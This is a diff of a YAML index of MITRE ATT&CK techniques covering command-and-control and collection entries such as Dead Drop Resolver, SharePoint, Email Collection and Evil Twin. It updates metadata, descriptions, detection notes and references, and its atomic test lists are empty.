       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -39236,7 +39716,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -39262,8 +39742,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -39317,7 +39795,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -39393,7 +39870,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -39450,7 +39926,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -39544,7 +40019,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -39623,7 +40097,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -39662,7 +40135,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39677,30 +40150,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39709,13 +40162,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -39729,20 +40186,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39785,7 +40259,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -39810,7 +40283,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39830,22 +40303,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39862,11 +40337,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -39882,37 +40356,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -39924,75 +40389,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -40019,7 +40502,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40043,13 +40526,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -40070,6 +40551,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -40093,8 +40575,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -40119,7 +40603,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -40186,12 +40669,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -40225,10 +40707,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -40239,13 +40723,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -40286,37 +40771,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40327,23 +40786,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40413,7 +40896,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -40448,7 +40930,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40467,10 +40949,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -40499,7 +41060,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
